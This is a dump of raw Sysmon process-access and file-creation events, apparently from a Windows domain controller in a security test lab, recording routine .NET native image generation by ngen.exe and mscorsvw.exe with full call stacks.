10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.393{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-EB02-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.377{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-EB02-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007073Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.377{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-EB02-000000009A01}4936C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007072Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.330{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-EA02-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007071Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.330{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-EA02-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007070Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.330{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-EA02-000000009A01}5072C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007069Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:54.268{08A6967A-45EA-6000-E902-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1078-0\System.Xaml.Hosting.dll2021-01-14 13:23:54.268 10341000x80000000000000007068Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.112{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EA-6000-E902-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007067Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.096{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-45EA-6000-E902-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007066Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:54.096{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EA-6000-E902-000000009A01}4216C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:55.955{08A6967A-45EB-6000-F002-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\f8c-0\UIAutomationClientsideProviders.dll2021-01-14 13:23:55.955 10341000x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.221{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EB-6000-F002-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.221{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-45EB-6000-F002-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.221{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EB-6000-F002-000000009A01}3980C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.127{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EB-6000-EF02-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.112{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EB-6000-EF02-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:55.112{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EB-6000-EF02-000000009A01}1180C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:55.049{08A6967A-45EA-6000-EE02-000000009A01}5024C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\13a0-0\UIAutomationClient.dll2021-01-14 13:23:55.049 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.752{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F602-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.752{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F602-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.752{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F602-000000009A01}3404C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.706{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F502-000000009A01}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.690{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F502-000000009A01}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.690{08A6967A-44E2-6000-3201-000000009A01}22204356C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F502-000000009A01}816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:23:56.627{08A6967A-45EC-6000-F402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\644-0\UIAutomationTypes.dll2021-01-14 13:23:56.627 10341000x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.315{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.315{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-45EC-6000-F402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.315{08A6967A-44E2-6000-3201-000000009A01}22202424C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{08A6967A-45EC-6000-F402-000000009A01}1604C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:23:56.268{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-45EC-6000-F302-000000009A01}5068C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntd